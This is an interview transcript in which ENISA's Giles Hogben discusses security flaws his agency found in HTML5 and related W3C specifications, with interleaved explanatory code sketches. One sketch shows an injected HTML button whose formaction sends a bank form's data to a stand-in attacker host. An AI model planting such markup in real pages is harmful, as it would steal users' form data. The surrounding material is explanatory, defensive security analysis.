Improving Internet Safety
ENISA Tackles Security Issues for Future Web Browsers
The team at the European Network and Information Security Agency identified 50 security threats in the new web standards and sent the W3C recommendations for how they should be addressed.
"In some cases, we're not actually expecting W3C to necessarily be able to fix all the problems, but what we're trying to do is flag some of the risks to the end users," says Dr. Giles Hogben, programme manager for secure services at ENISA.
Hogben and his team went through more than 1,000 pages of specifications, covering HTML5, the device APIs that give access to features such as GPS on smartphones, and packaged applications called widgets. They also analyzed browser security and privacy from the user's perspective.
"We ... looked at the role of the user in actually policing security and what's the role of the user in actually making secure decisions in the specifications in the browser," Hogben says in an interview with BankInfoSecurity.com's Tom Field [transcript below].
In an exclusive interview about ENISA's recommendations, Hogben discusses:
- ENISA's multi-layered efforts to improve security standards;
- Specific recommendations made regarding fixes to the pending web standards;
- Other online security initiatives being pursued by the agency.
Dr. Hogben is programme manager for secure services at the European Network and Information Security Agency in Greece. He has led numerous studies on network and information security, on topics including smartphone security, cloud computing, social network security and European identity card privacy. Before joining ENISA, he was a researcher at the Joint Research Centre in Ispra, Italy, where he led work on private credentials. He has a PhD in computer science from Gdansk University of Technology in Poland and graduated from Oxford University, UK, in 1994 in physics and philosophy.
TOM FIELD: To begin, could you tell us a little bit about yourself and your work with ENISA, please?
GILES HOGBEN: I'm an infosec guy. I've been working in information security and privacy for over 10 years now, and I work for ENISA, as you mentioned. ENISA is the European Union body which is responsible for information security, and we advise the commission and the member states, and we also collect information from the industry on best practices in security. Now my program, in particular, that I head up focuses on application security rather than infrastructure security that many of our teams focus on. In the last couple of years in particular, we've been looking at cloud computing, browser security, smartphones and secure development. That's been our main area of focus.
Improving New Web Standards
FIELD: What really got my attention was that ENISA has just released a set of recommended security fixes for new web standards. Could you give us a little bit of background on these standards?
HOGBEN: We've just released this report. HTML5 is the first major upgrade to the web browser standards in over 10 years, so we saw this as a major opportunity to get some "security by design" in there. HTML5 introduces a whole suite of new features to browsers, some of which have quite important implications for security. It's also come along with a number of other specifications which support the new features, and they also have important security implications. There's HTML5, and there's also the device API specifications, which give access to things like GPS on smartphones. There are also a number of new specifications which allow access across origins. Before, web security relied on what's called the same-origin policy, but a lot of developers were finding tricky ways to get around that. These new specifications clean up the mess of communicating between web applications from different origins. There's also a bunch of specifications around packaged applications called widgets. We have analyzed 13 of these specifications in total, focusing on HTML5, and that adds up to over 1,000 pages of specs, so it's really been a huge amount of work.
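The cross-origin communication Hogben refers to is standardized in HTML5 as the postMessage API. A minimal sketch of the receiving side's origin check, with the event object stubbed as a plain value so it runs outside a browser (the domain names are illustrative):

```typescript
// Cross-document messaging: the receiving page must verify event.origin
// itself. In a browser this handler would be attached via
// window.addEventListener("message", handler); here the event is a stub.
function makeReceiver(trustedOrigin: string) {
  return (event: { origin: string; data: string }): string | null => {
    // Accepting messages from any origin reopens the holes that the old
    // same-origin workarounds created; this check is the security model.
    if (event.origin !== trustedOrigin) return null;
    return event.data;
  };
}

const onMessage = makeReceiver("https://partner.example");
console.log(onMessage({ origin: "https://partner.example", data: "hello" })); // "hello"
console.log(onMessage({ origin: "https://evil.example", data: "hello" }));    // null
```

The explicit origin check replaces the fragment-identifier and window-name hacks that developers previously used to smuggle data between origins.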
FIELD: Well given the criticality of what you've just described to me, what makes the timing of this report so crucial?
HOGBEN: As I said, this is the first time in over 10 years that we've actually had a chance to have some security by design actually influence these new standards. This is really a historic, unique window of opportunity for us to actually influence the security of the browser. It's really quite amazing the timing, because we finished our report and we published it just two days before the last call for comments on HTML5. We managed to contribute to the standards at exactly the right time. After [this], security could be baked in for the next decade or more. So this is really a unique opportunity.
Issues with HTML5
FIELD: Given that opportunity, can you give us an overview of some of the recommended fixes that you proposed?
HOGBEN: Sure. I'm going to go through a few examples of the threats that we identified and maybe some of the fixes as well. Before I go into the detail, I just want to say that we looked not only at the individual specifications, like the HTML5 core and the widget specifications, but also at how they fit together. We found a number of threats that arise from the way the specifications slot together and the inconsistencies between them. We also looked at the role of the user in actually policing security and what's the role of the user in actually making secure decisions in the specifications in the browser.
Let's look at a few examples of stuff that we identified. I divide the examples into two main areas. One is new features of specifications which allow new attacks which would give access to the user's data. The other area is around defining permissions and how there are some inconsistencies and issues that we identified around permissions.
First of all, looking at the threats we identified around access to data and new attacks, the first example I'd like to look at is the new sandbox attribute. That's a new attribute in HTML5 which is supposed to completely isolate a browsing context, like an iframe, from the rest of the browser. That's a great thing, of course, but it also has some unexpected consequences for security. It actually disables some of the protections that the user previously had against clickjacking. Clickjacking is when you hijack the user's interface: you overlay part of one frame, or a page from one origin, over another origin, and you trick the user into clicking somewhere on the page they really shouldn't, submitting information to an attacker. One of the ways of protecting against that was to check whether your page is actually being framed, because the way to implement clickjacking is to frame a trusted page inside an untrusted page. And if that trusted page is inside a sandbox, it can't actually make those checks. The basic threat is that the sandbox makes it impossible to implement the protection against clickjacking that you could before.
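The frame-busting check Hogben describes can be sketched as follows. This is a simplified model: a real page compares window.top with window.self, and the sketch stands in plain objects for those browser globals so it runs anywhere:

```typescript
// Legacy clickjacking defense: detect whether the page is inside a frame.
// In a browser this is simply `window.top !== window.self`. A page loaded
// into an HTML5-sandboxed iframe (without allow-top-navigation) may detect
// framing but cannot navigate the top window to escape, which is the
// protection gap ENISA flags.
function isFramed(win: { top: object; self: object }): boolean {
  return win.top !== win.self;
}

// Simulated window objects:
const topLevel: any = {};
topLevel.top = topLevel;
topLevel.self = topLevel;

const frameWin: any = {};
frameWin.self = frameWin;
frameWin.top = topLevel; // its top is the attacker's outer page

console.log(isFramed(topLevel)); // false: not framed
console.log(isFramed(frameWin)); // true: framed, would try to break out
```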
Another interesting threat is that form buttons can now be placed anywhere in the HTML of a page. Whereas before they had to sit inside a form element, the attacker now has a much greater range of places where they can inject a button via HTML injection and persuade the user to submit information to the attacker.
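The mechanism behind this is HTML5's form attribute, which binds a button to a form by id from anywhere in the document. A hypothetical sketch of the injection risk, held in a string so the example is self-contained (the domains, ids and flaw are invented for illustration):

```typescript
// The injected <button> lives far from the form element it targets, and
// its formaction attribute even overrides where the data is sent. Any
// point where an attacker can inject markup becomes a viable attack point.
const page: string = `
  <form id="payment" action="https://bank.example/send" method="post">
    <input name="amount">
  </form>
  <!-- ...elsewhere in the page, planted via an HTML injection flaw: -->
  <button form="payment" formaction="https://attacker.example/collect">
    Continue
  </button>
`;

console.log(page.includes('form="payment"')); // true: button bound by id
console.log(page.includes("formaction"));     // true: submission redirected
```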
We also looked at the new ability to specify an online content handler. For example, you can now specify a remote URL to manage things like word processing documents, and we found that there's not really a well-defined trust model for allowing the user to decide which of those content handlers he/she should trust or not. Also we found that there's no real management of the permissions that you give to content handlers so that the user would give permission once and then completely forget what they've given permission for. There are a number of well-known security vulnerabilities that have arisen in the past around that, where you have very obscure content handlers which have been exploited by attackers.
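The API in question is navigator.registerContentHandler. Below is a hypothetical model of the permission lifecycle problem Hogben describes (a one-time grant with no review or revocation); the registry, MIME type and URL are illustrative assumptions, not part of any spec:

```typescript
// Sketch of the one-shot grant problem around content handlers.
const grantedHandlers = new Map<string, string>(); // MIME type -> handler URL

function registerHandler(mimeType: string, handlerUrl: string): void {
  // The user is prompted once at registration time (in the real API the
  // prompt comes from the browser chrome)...
  grantedHandlers.set(mimeType, handlerUrl);
  // ...but nothing in the specifications requires a way to review or
  // revoke the grant later, so an obscure handler registered long ago can
  // quietly keep receiving the user's documents.
}

registerHandler("application/x-obscure", "https://handler.example/open?doc=%s");
console.log(grantedHandlers.get("application/x-obscure"));
```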
We also found some issues around GPS and the handling of location data. For example, the GPS cache gives a timestamp, and we actually questioned why this timestamp is necessary. Why do we need to know when the GPS data was recorded? Those are the issues around access to data.
Then we had a whole load of issues that we found around permissions. First of all, one of the questions we asked concerns situations where you have different browsing contexts, like a frame within a wider document, and you're using the address of the page as the basis for a permission. It's not defined in the specification what should be used as the origin: the document origin or the frame origin.
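For reference, an origin is the scheme, host and port of a URL; the ambiguity Hogben raises is which document's URL feeds this computation when contexts are nested. A minimal sketch using the standard URL parser (the URLs are illustrative):

```typescript
// Derive the origin that same-origin and permission checks compare.
function originOf(url: string): string {
  const u = new URL(url); // WHATWG URL parser, built into Node and browsers
  return `${u.protocol}//${u.host}`; // host includes any non-default port
}

// An embedding document and the frame inside it can have different
// origins, and the specs do not say which one a permission is keyed to:
console.log(originOf("https://bank.example/page?x=1"));     // "https://bank.example"
console.log(originOf("https://widget.example:8443/frame")); // "https://widget.example:8443"
```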
Another really interesting area is around this emerging feature that you find in most browsers - private browsing mode. What we found is that the specifications really don't give enough information about how the browser should behave when it's in private browsing mode. For example, if you give permission to a site to do something when you're in private browsing mode, should that permission be stored? What happens to data that's cached when you're in private browsing mode?
Finally on permissions, the specifications define two different kinds of access to location data, what's called one-shot access and monitoring. Obviously one-shot is a single snapshot of your location, and monitoring is continuous access to your location. But the spec doesn't say whether the browser should ask permission differently for those two very different kinds of access to your data. In terms of how we think this should be fixed, a lot of this comes from inconsistencies across the specifications, and so we think that W3C should consider a separate specification which deals exclusively with permissions. That would help to create consistency across the different specifications in how permissions are dealt with.
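The two access styles correspond to getCurrentPosition and watchPosition in the W3C Geolocation API. The stub below simulates them outside a browser (the coordinates and update count are arbitrary) to show how different the two grants really are:

```typescript
type PositionCb = (lat: number, lon: number) => void;

// Stub of the two Geolocation API entry points; in a real browser both
// are methods on navigator.geolocation, and the concern above is that the
// spec doesn't require distinct permission prompts for them.
class GeoStub {
  calls = 0;
  // One-shot: a single snapshot of the user's location.
  getCurrentPosition(cb: PositionCb): void {
    this.calls++;
    cb(52.37, 4.89);
  }
  // Monitoring: the browser keeps invoking the callback as the user moves
  // (simulated here with a fixed number of updates).
  watchPosition(cb: PositionCb, updates = 3): number {
    for (let i = 0; i < updates; i++) {
      this.calls++;
      cb(52.37, 4.89);
    }
    return 1; // watch id, usable with clearWatch()
  }
}

const geo = new GeoStub();
geo.getCurrentPosition(() => {});
console.log(geo.calls); // 1: a single disclosure
geo.watchPosition(() => {});
console.log(geo.calls); // 4: ongoing disclosure under the same permission
```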
We also see issues with permissions in the specs and how they interact, for example, with an underlying operating system in a smartphone. If you're going to start using HTML for smartphone apps, which is something that a lot of people are talking about, there are going to be permissions asked by the iOS or Android, which might actually conflict or confuse the user when they're also asked in HTML5. We think there really needs to be a coordination across the different areas of specification when it comes to permissions. That was a long answer, but that's the main part of our report so I wanted to give you lots of information there.
FIELD: Those are great details and great suggestions. What's next in the process here?
HOGBEN: We have submitted 50 different threats that we discovered to the working groups, and we're in the process of discussing them with W3C. The next checkpoint in the standards process will be in January next year, so we're hoping to see our comments resolved by then. We've published the report, extracted the key points for each working group, and sent those out to the W3C working groups.
Other Areas for Improvement
FIELD: Meanwhile, your own work with ENISA continues. What are some of the other areas that you're working on now for improved online security?
HOGBEN: We are working on a set of secure development guidelines for smartphones. That's an area where we're hopeful of making a big difference, so I'm working with OWASP [Open Web Application Security Project] on secure smartphone development guidelines. We'll also be promoting some of the advice that we've given to end users on the basis of this analysis of HTML5 and the related specs. It's not just about improving the specifications, because we see that a lot of the design decisions that have created some of the security issues have actually been made for a good reason: to make the browser more usable in certain ways. For example, allowing form buttons outside the form element actually gives web developers a lot more flexibility.
In some cases, we're not actually expecting W3C to necessarily be able to fix all the problems, but what we're trying to do is flag some of the risks to the end users. In that context, our advice is that users should use different browsers for different kinds of surfing. If they're doing banking, for example, they should use one browser or a separate browsing context. In my job, I spend a lot of my time researching security vulnerabilities, and I might end up going to some dodgy websites; I should use a different browsing context for that. At the moment you can use a different browser for each of those contexts, but we're hoping that we might persuade some of the browser vendors, the makers of browsers like Firefox and Chrome, to make that separation of contexts easier within an individual browser, so that I could have different settings for different contexts. I might, for example, be able to turn off some of the less secure features, which may be needed for everyday browsing, when I'm doing something much more sensitive like Internet banking.
That's one of the areas that we're really going to be promoting, and we also want to try to get a formal specification of how the browser should behave in private browsing mode. At the moment, we think it's a great thing that all the browsers have a private browsing mode, but it's not well defined in the W3C specifications. We'd like to promote, as the next step, a private browsing mode specification that is common across the different browsers. As I mentioned, we also think that creating a common permission spec is something we want to promote. We also see a number of initiatives coming up like CSP, which is Content Security Policy. We think they are really going in the right direction in terms of creating control over the functionality that web pages implement.
Another really interesting initiative, from my point of view, is Strict Transport Security, the ability for a website to say to the client, "I'm only going to communicate with you using HTTPS." I think that's a really useful feature that we would like to support. That pretty much sums it up in terms of where we're going.
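Strict Transport Security works through a response header, Strict-Transport-Security, after which the browser upgrades plain http:// requests to that host before they leave the machine. A minimal model of that client-side behavior (the host names and max-age value are illustrative):

```typescript
// Hosts that have sent a valid Strict-Transport-Security header.
const hstsHosts = new Set<string>();

function recordHeader(host: string, headerLine: string): void {
  if (headerLine.toLowerCase().startsWith("strict-transport-security:")) {
    hstsHosts.add(host);
  }
}

// An HSTS-aware client rewrites the scheme before making the request,
// defeating SSL-stripping attacks on later visits.
function upgrade(url: string): string {
  const u = new URL(url);
  if (u.protocol === "http:" && hstsHosts.has(u.hostname)) {
    u.protocol = "https:";
  }
  return u.toString();
}

recordHeader("bank.example", "Strict-Transport-Security: max-age=31536000; includeSubDomains");
console.log(upgrade("http://bank.example/login")); // "https://bank.example/login"
console.log(upgrade("http://other.example/"));     // unchanged: "http://other.example/"
```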